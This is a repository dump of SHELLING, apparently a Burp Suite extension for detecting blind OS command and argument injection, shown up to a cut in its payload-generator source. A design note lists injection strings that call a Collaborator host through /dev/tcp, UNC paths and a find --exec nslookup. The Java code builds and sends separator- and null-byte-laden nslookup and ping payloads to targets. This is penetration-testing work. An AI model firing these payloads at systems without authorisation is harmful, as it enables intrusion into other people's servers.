Showing preview only (423K chars total). Download the full file or copy to clipboard to get everything.
Repository: PortSwigger/command-injection-attacker
Branch: master
Commit: 3469fec422ae
Files: 51
Total size: 403.5 KB
Directory structure:
gitextract__g4nibil/
├── BappDescription.html
├── BappManifest.bmf
├── DETECTING_ARGUMENT_INJECTION.md
├── Java/
│ └── src/
│ ├── burp/
│ │ ├── BinaryPayloadIssue.java
│ │ ├── BuildUnencodedRequest.java
│ │ ├── BurpExtender.java
│ │ ├── DirectScannerCheck.java
│ │ ├── ShellingScannerCheck.java
│ │ └── ShellingScannerIssue.java
│ └── uk/
│ └── co/
│ └── pentest/
│ └── SHELLING/
│ ├── IntruderPayloadGenerator.java
│ ├── IntruderPayloadGeneratorByte.java
│ ├── PayloadFactory.java
│ ├── SHELLING.java
│ ├── ShellingPanel2.form
│ ├── ShellingPanel2.java
│ ├── ShellingTab.java
│ ├── SimpleDocumentListener.java
│ └── collabSession.java
├── README.md
├── SHELLING.jar
├── TODO.txt
├── VERY_DEPRECATED_AND_NO_LONGER_MAINTAINED_shelling.pl
├── build.gradle
├── settings.gradle
└── test_cases/
├── arginj1.php
├── arginj_escape_shell_cmd.php
├── arginj_wget_doublequote.php
├── arginj_wget_noquotes.php
├── arginj_wget_singlequote.php
├── escape_cmd_shell_direct.php
├── escape_shell_cmd.php
├── lax_domain_name.php
├── no_colon_no_pipe_no_ampersand_no_dollar.php
├── no_space.php
├── no_space_no_colon_no_pipe_no_ampersand.php
├── no_white_chars.php
├── no_white_chars_no_colon_no_pipe_no_ampersand.php
├── no_white_chars_no_colon_no_pipe_no_ampersand_and_quote.php
├── no_white_chars_no_colon_no_pipe_no_ampersand_no_dollar.php
├── no_white_chars_start_alphanum.php
├── no_white_chars_start_digit.php
├── no_white_chars_stop_alnum.php
├── no_white_chars_stop_alphanum.php
├── no_white_chars_windows_blind.php
├── no_white_space_no_colon_no_pipe_no_ampersand_no_dollar.php
├── simple.php
├── simple_nested_quotes1.php
├── simple_no_spaces.php
├── simple_start_alphanum.php
├── simple_stop_alphanum.php
└── tar.php
================================================
FILE CONTENTS
================================================
================================================
FILE: BappDescription.html
================================================
<p>This extension is a customizable payload generator, suitable for detecting OS command injection flaws during dynamic testing - which is usually conducted with no access to the source code or the filesystem. Creation of SUCCESSFUL payloads in this kind of assessments requires a lot of guesswork, especially:</p>
<ul>
<li>The eventual syntax of the expression we are injecting into (e.g. quoted expressions)</li>
<li>Input sanitizing mechanisms rejecting individual characters (e.g. spaces)</li>
<li>Platform-specific conditions (e.g. there is no "sleep" on windows)</li>
<li>Callback method (e.g. asynchronous execution, no outbound traffic allowed)</li>
</ul>
<p>The purpose of creating this tool was to reach the non-trivial OS command injection cases, which stay undetected by generally known and used tools and sets of payloads.</p>
================================================
FILE: BappManifest.bmf
================================================
Uuid: 33e4402eee514724b768c0342abadb8a
ExtensionType: 1
Name: Command Injection Attacker
RepoName: command-injection-attacker
ScreenVersion: 2.0
SerialVersion: 2
MinPlatformVersion: 0
ProOnly: False
Author: Julian Horoszkiewicz, Secarma Ltd.
ShortDescription: Customizable payload generator to detect and exploit command injection flaws during blind testing.
EntryPoint: ./build/libs/shelling.jar
BuildCommand: gradle jar
================================================
FILE: DETECTING_ARGUMENT_INJECTION.md
================================================
# Detecting argument injection
Apart from differences in application's response, we might dalso detect argument injection by:
- reference injection- we supply an argument that, if interpreted properly, will ensue a network response (e.g. a DNS lookup, HTTP/FTP/SMB interaction etc) - this can be bruteforced
- command injection through the target-specific argument - we supply an arbitrary command into a command-specific flag - which is our "base" command in SHELLING (doing whatever the setting is, e.g. a lookup or sleep/selfping) - this is rather hardcoded, e.g. "find / -name <INJECTION>" with injection "a --exec nslookup PAYLOAD_MARK.BURP_COLLAB_DOMAIN".
## Reference injection
In the first approach we have no idea what is the target command we are injecting arguments into. The main assumption is that there are only letters, uppercase letters and digits (the last not likely to take any argument values, though) that can represent short flags in formats:
COMMAND -FLAG
COMMAND /FLAG
At this point we do not attempt to bruteforce any full names (long versions of the flags), like:
COMMAND --FULL_FLAGNAME
Good candidates for values are:
smb://wzzec5jztfjusa225ubi8pi1osuii7.burpcollaborator.net/a
file://wzzec5jztfjusa225ubi8pi1osuii7.burpcollaborator.net/a
http://wzzec5jztfjusa225ubi8pi1osuii7.burpcollaborator.net/a
ftp://wzzec5jztfjusa225ubi8pi1osuii7.burpcollaborator.net/a
Additionally these are worth checking too:
>\\wzzec5jztfjusa225ubi8pi1osuii7.burpcollaborator.net\a
> /dev/tcp/wzzec5jztfjusa225ubi8pi1osuii7.burpcollaborator.net/80
This might as well work with injections like (plus the nix variant from above):
>\\wzzec5jztfjusa225ubi8pi1osuii7.burpcollaborator.net\a
>\\wzzec5jztfjusa225ubi8pi1osuii7.burpcollaborator.net\a<NULLBYTE>
>\\wzzec5jztfjusa225ubi8pi1osuii7.burpcollaborator.net\a<POOTERMINATOR>
>\\wzzec5jztfjusa225ubi8pi1osuii7.burpcollaborator.net\a::COMMENT OUT
whereas neither command nor argument separators are allowed, but we can redirect the outpt to an arbitrary local file (which might be very good too :D).
## Command inejction
In this case we check for particular flags in particular binaries (assuming that the matching binary is being executed on the server), e.g. --exec in find, -O in wget or /c in some windows commands.
## Syntax
We should still keep in mind quotes in the final expression syntax might make our payload fail, hence we need to make sure we also create and evaluate proper test cases while developing this feature.
This is all experimental.
================================================
FILE: Java/src/burp/BinaryPayloadIssue.java
================================================
package burp;
public class BinaryPayloadIssue extends ShellingScannerIssue {
private String issueDetail;
private static final String DETAIL_TEMPLATE = "The target seems vulnerable to OS Command Injection.<br>";
private static int counter=0;
public BinaryPayloadIssue(IBurpExtenderCallbacks cb,IHttpRequestResponse exploitRR, String details, String feedbackMethod) {
super(cb,exploitRR,details,feedbackMethod);
issueDetail = DETAIL_TEMPLATE;
}
public void appendIssueDetail(String text)
{
this.issueDetail = this.issueDetail+text;
}
@Override
public String getIssueDetail() {
return issueDetail;
}
}
================================================
FILE: Java/src/burp/BuildUnencodedRequest.java
================================================
package burp;
import java.util.Random;
public class BuildUnencodedRequest
{
private Random random = new Random();
private IExtensionHelpers helpers;
BuildUnencodedRequest(IExtensionHelpers helpers)
{
this.helpers = helpers;
}
byte[] buildUnencodedRequest(IScannerInsertionPoint iScannerInsertionPoint, byte[] payload) throws Exception
{
byte[] canary = buildCanary(payload.length);
byte[] request = iScannerInsertionPoint.buildRequest(canary);
int canaryPos = findCanary(canary, request);
System.arraycopy(payload, 0, request, canaryPos, payload.length);
return request;
}
private byte[] buildCanary(int payloadLength)
{
// random alphanum string, same length as payload
String chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
byte[] canary = new byte[payloadLength];
for(int i = 0; i < payloadLength; i++)
{
canary[i] = (byte) chars.charAt(random.nextInt(chars.length()));
}
return canary;
}
private int findCanary(byte[] canary, byte[] request) throws Exception
{
int canaryPos = helpers.indexOf(request, canary, false, 0, request.length);
if(canaryPos == -1)
{
throw new Exception("Cannot locate canary in request");
}
int canaryPos2 = helpers.indexOf(request, canary, false, canaryPos + 1, request.length);
if(canaryPos2 != -1)
{
throw new Exception("Multiple canary found in request");
}
return canaryPos;
}
}
================================================
FILE: Java/src/burp/BurpExtender.java
================================================
package burp;
import uk.co.pentest.SHELLING.SHELLING;
import uk.co.pentest.SHELLING.ShellingTab;
import uk.co.pentest.SHELLING.PayloadFactory;
/**
* The main entry class that Burp calls to load/unload the extension.
*/
public class BurpExtender implements IBurpExtender, IExtensionStateListener {
@Override
public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
SHELLING.callbacks = callbacks;
callbacks.setExtensionName("SHELLING");
SHELLING.ShellingTab = new ShellingTab();
callbacks.addSuiteTab(SHELLING.ShellingTab);
callbacks.registerExtensionStateListener(this);
callbacks.registerIntruderPayloadGeneratorFactory(new PayloadFactory(SHELLING.ShellingTab, "cmd"));
callbacks.registerIntruderPayloadGeneratorFactory(new PayloadFactory(SHELLING.ShellingTab, "byte2"));
//callbacks.registerScannerCheck(new CollaboratorScannerCheck(callbacks));
callbacks.registerScannerCheck(new DirectScannerCheck(callbacks,SHELLING.ShellingTab));
}
@Override
public void extensionUnloaded() {
}
public static IBurpExtenderCallbacks getBurpCallbacks() {
return SHELLING.callbacks;
}
}
================================================
FILE: Java/src/burp/DirectScannerCheck.java
================================================
/*
The simple scanner check class for SHELLING.
Sends all the payloads one after another, supports DNS (network) and sleep (time) feedback channels. Will also automatically support "file" once it becomes a thing.
*/
package burp;
import java.util.List;
import java.util.ArrayList;
import java.net.URL;
import java.util.logging.Level;
import java.util.logging.Logger;
import uk.co.pentest.SHELLING.IntruderPayloadGenerator;
import uk.co.pentest.SHELLING.ShellingTab;
public class DirectScannerCheck extends ShellingScannerCheck {
private ShellingTab tab;
private boolean last400Avoid=false; // whether the last request made was replied with a 400/something along these lines AND the payload contained a white char known to break things HTTP message format when used as literal
private List<IScanIssue> issues;
private IHttpRequestResponse attackReq;
public DirectScannerCheck(IBurpExtenderCallbacks cb, ShellingTab tab)
{
super(cb,tab);
this.tab = tab;
checkHttpService = null;
}
@Override
public int consolidateDuplicateIssues(IScanIssue existingIssue,IScanIssue newIssue) {
return -1;
}
@Override
public List<IScanIssue> doActiveScan(IHttpRequestResponse baseRequestResponse,IScannerInsertionPoint insertionPoint)
{
this.issues = null;
if(tab.shellingPanel.scannerChecks==false) return this.issues; // the switch off (scanner is not enabled, goodbye)
//
// We will NO LONGER return scanner issues from this method for DNS and file feedback channels (because they are not direct).
// doActiveScan() will only return scan issues triggered directly by itself, the current running instance (when using file and time as feedback channels).
// All the DNS interactions (synchronous/asynchronous, does not matter at this point) will be watched by the checkCollabSessions() call (triggered by Scanner/Intruder/Export/exit/schedule?)
// which will, in turn, will use the addScanIssue() API (with the help of code taken from this useful project https://github.com/PortSwigger/manual-scan-issues).
// Hence, checkCollabInteractions() no longer needs to return issues. We just call it BEFORE starting the actual new scan (this should happen even if the method is again manual, in order not to miss any asynchronously called stuff from previous "auto" calls) + DURING + AFTER.
this.tab.shellingPanel.checkCollabInteractions(false);
IRequestInfo reqInfo = helpers.analyzeRequest(baseRequestResponse);
URL url = reqInfo.getUrl();
int port = url.getPort();
String loc="";
int delaySeconds = this.tab.shellingPanel.getDelay();
delaySeconds -= 4; // small, SMALL tuning to avoid false negatives (making this thing a bit more sensitive); ping -c25 localhost took only 24 seconds and thus stayed undetected
// while if this becomes an issue do to slow response times, one can always increase the delay in options if false positives show up
// this delaySeconds shift (4 secs) should be lower the longer the natural response time is
// but we are not going too introduce intelligent tuning, are we? maybe manual?
//
// in our case localhost is very fast, usually this will not happen
boolean https=false;
String host = url.getHost();
if(url.getProtocol()=="https") https=true;
String urlStr = url.getProtocol()+"://"+url.getHost()+":"+url.getPort()+url.getPath();
if(!createCheckHttpService(host,port,https))
{
callbacks.printError("HTTP connection failed");
callbacks.issueAlert("HTTP connection failed");
return issues;
}
// create new generator object with a dedicated collaborator subdomain (if DNS used as feedback channel)
generator = new IntruderPayloadGenerator("cmd", tab, "scanner", baseRequestResponse, insertionPoint.getInsertionPointName());
// the insertion point should deliver the prefix! to bad intruder can't do this
// save the last generator for the purpose of the asynchronous checkForCollabInteractions() method
if(this.tab.shellingPanel.feedbackChannel=="DNS")
{
loc = generator.loc; // this might be empty as we MIGHT be using a different feedback channel
}
generator.setBase(baseRequestResponse);
int counter=0; // we need to limit the frequency with which we are calling the collabSessions check, for the purpose of performance and good manners
while(generator.hasMorePayloads())
{
if(tab.shellingPanel.stopAllRunningScans.isSelected()==true) break; // this should allow us to stop the scan (all of them) by ticking off the box, instantly
byte[] payload = generator.getNextPayloadSmart(insertionPoint.getBaseValue().getBytes(),this.last400Avoid);
// domain name is now automatically provided by the getNextPayload function, used by both scanner and intruder in cooperation with our session tracking system
if(payload.length==1)
{ //payload generation failed, move onto next command
callbacks.printError("Payload generation failed!");
callbacks.issueAlert("Payload generation failed!");
return this.issues;
}
// To avoid Burp's default behaviour with automatic encoding of insertion points in Scanner
// we replaced "byte [] req = insertionPoint.buildRequest(payload);"
// with new BuildUnencodedRequest(helpers).buildUnencodedRequest(insertionPoint, helpers.stringToBytes(payload))
// as adviced by Paj: https://support.portswigger.net/customer/portal/questions/17301079-design-new-extension-problem-with-buildrequest-and-url-encode
// with his code snippet: https://gist.github.com/pajswigger/c1fff3ce6e5637126ff92bf57fba54e1
byte [] req=null;
try {
req = new BuildUnencodedRequest(helpers).buildUnencodedRequest(insertionPoint, payload);
} catch (Exception ex) {
Logger.getLogger(DirectScannerCheck.class.getName()).log(Level.SEVERE, null, ex);
}
//byte [] req = insertionPoint.buildRequest(payload);
//callbacks.printError((new String(req))+"\n\n");
// 1. time as feedback channel (detecting a delay in the response)
//if(tab.shellingPanel.feedbackChannel=="time")
//{
long millisBefore = System.currentTimeMillis(); // only used for time
attackReq = callbacks.makeHttpRequest(baseRequestResponse.getHttpService(),req); // we perform the attack, because we already know the payload
byte[] resp = attackReq.getResponse();
IResponseInfo responseInfo = helpers.analyzeResponse(resp);
if(responseInfo.getStatusCode()==400&&this.tab.shellingPanel.includeLiteralWhites.isSelected()==true&&this.tab.shellingPanel.smart400Avoidance.isSelected()) // baddie avoidance
{
// search the payload
for(int l=0;l<payload.length;l++)
{
if(this.tab.shellingPanel.containsBaddies(payload))
{
this.last400Avoid=true; // it simply means: "literal white chars cause 400 responses from this target in this scan task
this.tab.shellingPanel.logOutput("A baddie detected, turning 400 avoidance on (means no more literal white chars in this scan task)!");
break;
}
}
}
long millisAfter = System.currentTimeMillis(); // only used for time
// Default trigger threshold for "time" feedback channel is 25 seconds, so the difference has to be at least 15 seconds provided that it takes approx. 10 to get a normal response
// anyway, made this customisable to anyone encountering false positives with this method.
long diff = millisAfter-millisBefore;
if(this.tab.shellingPanel.feedbackChannel=="time"&&diff>delaySeconds*1000)
{
this.issues = new ArrayList<IScanIssue>(1);
BinaryPayloadIssue issue;
String details="A potential OS command injection vulnerability was detected using time as the feedback channel.<br><br>";
details+="The following payload was supplied to the <b>"+insertionPoint.getInsertionPointName()+"</b> input parameter: <b>"+this.helpers.bytesToString(payload)+"</b><br><br>";
details+="The server took <b>"+Long.toString(diff)+"</b> miliseconds to respond.<br><br>";
details+="Please be aware that delayed response can happen for multiple reasons, therefore comparing response time with the expected time of additional delay introduced by payloads like <b>sleep 25</b> or <b>ping -n25 localhost</b> is prone to false positives. Investigate this instance manually.<br><br>If you are getting too many false positivies, try to increase the delay in SHELLING -> Global settings or consider using a different feedback channel, e.g. DNS.";
issue = new BinaryPayloadIssue(callbacks,attackReq,details,"time");
//issue.
this.issues.add((IScanIssue) issue);
// return upon the first hit - we should make this adjustable in the config as well
return this.issues; // we don't worry about interrupting anything, it's just our own direct attack and it was successful, we got what we needed, no need to search for more valid payloads
}
// 2. filesystem as a feedback channel needs to be implemented too
// if set, it will do nothing here - which is good, as it is up to the user to inspect the filesystem
// so far we are good with "time" and "file"
// also, "response" will be handled right here once we start supporting it as a feedback channel
// now "DNS"
// 3. DNS as the feedback channel
// So, the point is we do not want to stop sending payloads only because we encountered some collab interaction
// as we might be dealing with a response to one of the previous payloads - which is good as we have to report it
// but it does not mean we should stop sending payloads unless we can be sure we are dealing with different sessions (different collabLoc).
// the check for collab interactions callback run periodically
// we could rely entirely on the additional call of this we perform before exiting this method
// but the problem is we might get stuck with long scans with the issue staying unnoticed (which would suck soo badly).
if(tab.shellingPanel.feedbackChannel=="DNS")
{
counter++;
if(counter%200==0) // check for feedback every 200 requests
{
this.tab.shellingPanel.checkCollabInteractions(false); // just call it and let it do its job (we could provide it with an argument (locId) so it filters
// them out for us... but again, we want this to he handled separately, so it can ALSO catch Intruder-induced hits as Scanner issues (yup, that's the point of it)
//if(this.issues!=null&&this.issues.size()>0)
//{
// we don't return here because we might be finding a response from a previous scan
// and we don't want it to stop our CURRENT
//}
}
}
}
// OK there is no more payloads left in the generator
// now would be the good time to save the shellings_raw payload set in the collabSession, if we want to track it
// and do likewise with Intruder and export (if the "auto" mode is on)
// we are just about to return null
if(tab.shellingPanel.feedbackChannel=="DNS")
{
try
{
Thread.sleep(10);
this.tab.shellingPanel.checkCollabInteractions(true); // one last check after the scan is done (enforce this last one even if the previous one happened earlier than the limit
}
catch(Exception e)
{
// whateva
}
}
return null;
}
} // end of the class
================================================
FILE: Java/src/burp/ShellingScannerCheck.java
================================================
/*
Parent abstract class for Active Scan checks to detect Command Injection with Burp Collaborator.
Initializes all base values for ScannerCheck sub classes containing issue request/response highlight indices.
*/
package burp;
import java.util.List;
import uk.co.pentest.SHELLING.IntruderPayloadGenerator;
import uk.co.pentest.SHELLING.ShellingTab;
abstract class ShellingScannerCheck implements IScannerCheck {
protected IBurpExtenderCallbacks callbacks;
protected IExtensionHelpers helpers;
//protected ShellingPayloadGenerator generator;
protected IntruderPayloadGenerator generator;
protected IHttpService checkHttpService;
protected static int counter=0;
public ShellingScannerCheck(IBurpExtenderCallbacks cb, ShellingTab tab) {
callbacks = cb;
helpers = callbacks.getHelpers();
}
protected boolean createCheckHttpService(String host, int port, boolean https)
{
if((host==null) || ((port<1) || (port>65535)))
{
return false;
}
else if(host.isEmpty() || ((port<1) || (port>65535)))
{
return false;
}
if(checkHttpService==null)
{ //HttpService object not yet created, attempt to create
checkHttpService = helpers.buildHttpService(host,port,https);
}
else
{
//HttpService object already created, compare to inputted settings and recreate if different
String currHost = checkHttpService.getHost();
int currPort = checkHttpService.getPort();
String currHttps = checkHttpService.getProtocol();
if(!(currHost.equals(host) && (currPort==port) && (currHttps.equalsIgnoreCase("http"+(https ? "s" : "")))))
checkHttpService = helpers.buildHttpService(host,port,https);
}
return true;
}
@Override
public List<IScanIssue> doPassiveScan(IHttpRequestResponse baseRequestResponse) {
return null;
}
@Override
public abstract int consolidateDuplicateIssues(IScanIssue existingIssue,IScanIssue newIssue);
@Override
public abstract List<IScanIssue> doActiveScan(IHttpRequestResponse baseRequestResponse,IScannerInsertionPoint insertionPoint);
}
================================================
FILE: Java/src/burp/ShellingScannerIssue.java
================================================
package burp;
import java.net.URL;
abstract public class ShellingScannerIssue implements IScanIssue {
//IScanIssue fields
private IHttpRequestResponse[] httpMessages;
private IHttpService httpService;
private String remediationBackground;
private URL url;
private String confidence="Certain";
private String feedbackMethod;
private IBurpExtenderCallbacks callbacks;
private IExtensionHelpers helpers;
private String ISSUE_BACKGROUND = "Someone is having a good day.<br>";
private String REM_BACKGROUND = "It's time to play.<br>";
//private static int counter=0;
ShellingScannerIssue(IBurpExtenderCallbacks cb,IHttpRequestResponse exploitRR, String details, String feedbackMethod) {
callbacks = cb;
helpers = callbacks.getHelpers();
url = helpers.analyzeRequest(exploitRR).getUrl();
httpService = exploitRR.getHttpService();
httpMessages = new IHttpRequestResponse[] {exploitRR};
this.feedbackMethod=feedbackMethod;
//counter++;
//this.feedbackChannel="(SHELLING - "+feedbackMethod+" - "+Integer.toString(this.counter)+")";
if(feedbackMethod=="time")
{
this.confidence="Tentative"; // let's be honest with our users
}
ISSUE_BACKGROUND = ISSUE_BACKGROUND + details; // let's see if this will fool the 'duplicate-detection' algorithm or whatever has been making our "details" global up until now
//REM_BACKGROUND = "";
}
//IScanIssue methods
@Override
public String getConfidence() {
return this.confidence;
}
@Override
public IHttpRequestResponse[] getHttpMessages() {
return httpMessages;
}
@Override
public IHttpService getHttpService() {
return httpService;
}
@Override
public String getIssueBackground() {
return ISSUE_BACKGROUND;
}
@Override
public abstract String getIssueDetail();
@Override
public String getIssueName() {
return "Command Injection (SHELLING-"+this.feedbackMethod+")";
}
@Override
public int getIssueType() {
return 0;
}
@Override
public String getRemediationBackground() {
return REM_BACKGROUND;
}
@Override
public String getRemediationDetail() {
return null;
}
@Override
public String getSeverity() {
return "High";
}
@Override
public URL getUrl() {
return url;
}
}
================================================
FILE: Java/src/uk/co/pentest/SHELLING/IntruderPayloadGenerator.java
================================================
package uk.co.pentest.SHELLING;
import burp.BurpExtender;
import burp.IBurpExtenderCallbacks;
import burp.IHttpRequestResponse;
import burp.IIntruderPayloadGenerator;
import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.swing.JOptionPane;
import javax.swing.ListModel;
/**
*
* @author julianh
*/
public final class IntruderPayloadGenerator implements IIntruderPayloadGenerator
{
IBurpExtenderCallbacks callbacks = BurpExtender.getBurpCallbacks();
ShellingTab tab;
int payloadIndex; // counter for the getNextPayload and hasMorePayloads methods
boolean payloadMarking; // whether or not to use payload marking
Integer cnt=0; // counter for the payload marker
String payloadType; // cmd or mark
ArrayList<String> shellings; // the final payloads
ArrayList<String> shellings_raw; // payloads before output encoding
ArrayList<String> basePayloads; // my @BASE_PAYLOADS=($PAYL);
String letters="abcdefghijklmnroqprstuvxyzACDEEFGHIJCKLMNROQPRSTUVXYZ";
ArrayList<String> argumentSeparators; // my @ARGUMENT_SEPARATORS=('%20%20',"%09%09");
ArrayList<String> commandSeparators; // my @COMMAND_SEPARATORS=('%0a%0a','%26','|');
ArrayList<String> commandTerminators; // my @COMMAND_TERMINATORS=("%00",'%F0%9F%92%A9');
ArrayList<String> nixCommandSeparators;
ArrayList<String> nixArgumentSeparators;
ArrayList<String> nixCommandTerminators; //
ArrayList<String> winCommandTerminators; //
ArrayList<String> winCommandSeparators;
ArrayList<String> winArgumentSeparators;
ArrayList<String> winEchoArgumentSeparators;
ArrayList<String> prefixes;
ArrayList<String> prefixSuffixes;
ArrayList<String> argInjectionArguments;
String command;
String argument;
String secondArgument="";
String targetOS;
String action;
//String payload; // the base payload in high level form ({COMMAND}{SEPARATOR}{ARGUMENT})
String winPayload; // the base payload in high level form ({COMMAND}{SEPARATOR}{ARGUMENT})
String nixPayload; // will differ if the feedback channel is time (as opposed to DNS, whereas nslookup call looks exactly the same)
String feedbackChannel;
String mode="auto"; // possible values: auto (scanner + intruder), manual (intruder only)
boolean argumentInjection;
boolean last400Avoid=false;
// boolean
public String loc=""; // collaboratorSession location (if in use)
public IntruderPayloadGenerator(String payloadType, ShellingTab tab, String currentAction, IHttpRequestResponse baseRequestResponse, String insertionPointName)
{
// currentAction possible values
// scanner
// intruder
// export
// activeScan is true for Scanner calls only (as opposed to Intruder and external export calls)
// init from the arguments
this.payloadType = payloadType;
this.tab=tab;
if(!this.tab.shellingPanel.argInjectionCheckBox.isSelected()&&!this.tab.shellingPanel.doCommandInjection.isSelected()&&!this.tab.shellingPanel.doTerminalInjection.isSelected())
{
// message box
if(this.tab.shellingPanel.warningDisplayed==false)
{
JOptionPane.showMessageDialog(null, "At least one attack (Command injection, Terminal injection or Argument injection) must be enabled!", "[SHELLING extension] At least one kind of injection payloads must be enabled!", JOptionPane.INFORMATION_MESSAGE);
this.tab.shellingPanel.warningDisplayed=true; // avoid annoying message flooding
}
return;
}
this.tab.shellingPanel.warningDisplayed=false;
this.tab.shellingPanel.curr_generator=this;
this.action=currentAction; // so we know whether it's scanner, intruder or export.
// init from the UI
this.mode=this.tab.shellingPanel.mode; // we know whether auto mode is on for Intruder and export.
this.targetOS=this.tab.shellingPanel.targetOS;
this.command=this.tab.shellingPanel.commandField.getText();
this.argument=this.tab.shellingPanel.argumentField.getText().trim();
this.feedbackChannel=this.tab.shellingPanel.feedbackChannel;
if(this.tab.shellingPanel.payloadMarkingBox.isSelected())
{
this.payloadMarking=true;
}
else
{
this.payloadMarking=false;
}
// other init
shellings=new ArrayList<String>();
shellings_raw=new ArrayList<String>();
basePayloads=new ArrayList<String>();
argumentSeparators=new ArrayList<String>();
argumentSeparators=new ArrayList<String>();
commandSeparators=new ArrayList<String>(); // my @COMMAND_SEPARATORS=('%0a%0a','%26','|');
commandTerminators=new ArrayList<String>(); // my @COMMAND_TERMINATORS=("%00",'%F0%9F%92%A9');
nixCommandSeparators=new ArrayList<String>();
nixArgumentSeparators=new ArrayList<String>();
nixCommandTerminators=new ArrayList<String>();
winCommandTerminators=new ArrayList<String>(); // the new one, not included in the incompatible target-checking thingy
winCommandSeparators=new ArrayList<String>();
winArgumentSeparators=new ArrayList<String>();
winEchoArgumentSeparators=new ArrayList<String>();
prefixes=new ArrayList<String>();
prefixSuffixes=new ArrayList<String>();
this.prefixes.add("PREFIX_HOLDER"); // this will be replaced in a late (getNextPayload() in the IntruderPayloadGenerator) stage by the base payload
this.prefixSuffixes.add("'");
this.prefixSuffixes.add("\"");
// in case of argument injection, we'll set argument to PARAM_INJECTION_STRING ARGUMENT_SEPARATOR EVIL_PARAM , so it will follow the first occurrence of ARGUMENT_SEPARATOR
// OK, let's roll
// mode="auto" switch only makes sense for intruder - it is always "auto" for the scanner
// we need to make sure this setting does not fuck our scanning capabilities up - well, it gets read from the current panel setting, so I guess it's OK
if(mode=="auto"||currentAction=="scanner") // only "auto" mode intruder sessions + scanner sessions are tracked by out collabSessions system!
{
if(feedbackChannel=="DNS")
{
// register a new collaborator session to track
this.loc = this.tab.shellingPanel.collabClient.generatePayload(true); // OK, we need to know this for the scannner at least
// let's grab the requestResponse base object!
this.tab.shellingPanel.collabSessions.add(new collabSession(loc,currentAction, baseRequestResponse, insertionPointName)); // this UNKNOWN thing needs to be replaced with the last known URI seen in Intruder
this.tab.shellingPanel.logOutput("Created a new collaborator session "+loc+" for "+currentAction+".");
// ok, we would really love to find a way to get the base request response for the current intruder attack
// but intruder does not expose this API, we are currently called by its registered payload generator
// which is not being provided with anything useful and there is nothing we can directly call
// which is a pity... all we are trying to do here is to easily track back all asynchronous interactions triggered by Intruder attacks
// automatically - without the user having to manually run and poll the Collaborator Client (this is the entire purpose of the "auto" mode)
// it's gonna be slightly difficult - we can trace the time (of execution), the payload number and the configuration at the time
// plus the actual intruder attack timestamp (time of the new domain "loc" creation by the Collaborator)
// so will still be traceable with Flow, it just sucks ass but it is still better than not having asynchro watch when using custom Intruder/Scanner payloads at all
command="nslookup";
if(payloadMarking)
{
argument="PAYLOAD_MARK.BURP_COLLAB_DOMAIN";
}
else
{
argument="BURP_COLLAB_DOMAIN";
}
winPayload=nixPayload=command+"ARGUMENT_SEPARATOR"+argument;
}
if(feedbackChannel=="time") // time explicitly
{
// so we decided to switch to ping for both platforms, as only -n vs -t parameter differs between nix/win, so at least we have the same
// potential set of "bad characters"
command="ping"; // sleep$IFS$925 was getting false negatives, while the workaround sleep$IFS$9$((25)) requires additional char to work
// ping$IFS$9-c$IFS$91$IFS$9127.0.0.1 has the same problem ($IFS$9 blending into 25 -> $925 and 127 -> $9127
// we'll just simpler syntax (ping -c25 instead of ping -c 25) and localhost instead of 127
// we might wanna introduce more variants of these commands
// like both ping$IFS$9-c25$IFS$9localhost AND sleep$IFS$9$((25))
argument=Integer.toString(this.tab.shellingPanel.getDelay());
secondArgument="localhost";
winPayload="pingARGUMENT_SEPARATOR-nARGUMENT_SEPARATOR"+argument+"ARGUMENT_SEPARATOR127.0.0.2";
nixPayload="pingARGUMENT_SEPARATOR-c"+argument+"ARGUMENT_SEPARATOR"+secondArgument;
// the results are in:
// 25 packets transmitted, 25 received, 0% packet loss, time 24010ms
// rtt min/avg/max/mdev = 0.018/0.031/0.051/0.010 ms
// Execution took 24 seconds ... so, flew under the radar, we need to be more tolerant as 25 pings took only 24 seconds.
// so, we keep the getDelay() value at its current level, we decrease the tolerance margin in the scanner
//
}
/*
if(feedbackChannel=="file")
// once implemented, available both in the auto mode and for the scanner
// cause why not, although it would be a very rare scenario - auto scanning with FS access without knowin the target OS?
// maybe for large-scale assessments involving multiple targets, but why not to support such scan for ALL OS?
// this is one of the channels that requires different command patterns due to lack of compatible "command param" values.
{
}
if(feedbackChannel=="response") // to be implemented
{
}
*/
}
else
{
winPayload=nixPayload=command+"ARGUMENT_SEPARATOR"+argument; // the base payload is the same, as no OS-specific or "auto" trickery
}
this.tab.shellingPanel.logOutput("Base payload: "+nixPayload+"\n");
basePayloads.add(nixPayload);
if(nixPayload!=winPayload)
{
this.tab.shellingPanel.logOutput("Base payload 2: "+winPayload+"\n");
basePayloads.add(winPayload);
} // print the second one if different
// let's initiate the building element variables
// universal argument separators
this.argumentSeparators.add(" "); // space
this.argumentSeparators.add(this.byteToString((byte)0x09)); // 09, horizontal tab
// universal command separators
this.commandSeparators.add(this.byteToString((byte)0x0a)); // newline
this.commandSeparators.add("&"); // ampersand
this.commandSeparators.add("|"); // pipe
// command/string terminators
if(this.tab.shellingPanel.useTerminatorsCheckBox.isSelected())
{
if(this.tab.shellingPanel.includeThePooComboBox.isSelected())
{
this.commandTerminators.add("💩");
}
// the poo character, this should only work with asynchronous strings entering a mysql database first, should be disabled by default
if(this.tab.shellingPanel.useNullByte.isSelected()==true)
{
this.commandTerminators.add(this.byteToString((byte)0x00)); // nullbyte
}
if(this.tab.shellingPanel.osSpecificTerminators.isSelected())
{
this.nixCommandTerminators.add(" #");
this.winCommandTerminators.add("::");
// this.winCommandTerminators.add("::"); WHY IS THIS NOT A THING? we'll have to investigate the incompatibleTypes function and prolly improve it
// before we implement best-effort payloads
}
// get the custom terminators as well
ListModel terminatorModel = this.tab.shellingPanel.terminatorList.getModel();
// also make sure strings are in hex, e.g. by forcefully switching to hex mode
this.tab.shellingPanel.switchToHex();
for(int i=0;i<terminatorModel.getSize();i++)
{
String asciihex=terminatorModel.getElementAt(i).toString();
// ok, now we need to convert it back to characters and store in the breakupTraversals array
StringBuilder output = new StringBuilder();
for (int j = 0; j < asciihex.length(); j+=2)
{
String str = asciihex.substring(j,j+2);
output.append((char)Integer.parseInt(str,16));
}
this.commandTerminators.add(output.toString());
}
}
// OS-specific command separators
// nix-like command separators
this.nixCommandSeparators.add(";"); // semicolon
// nic-like argument separators
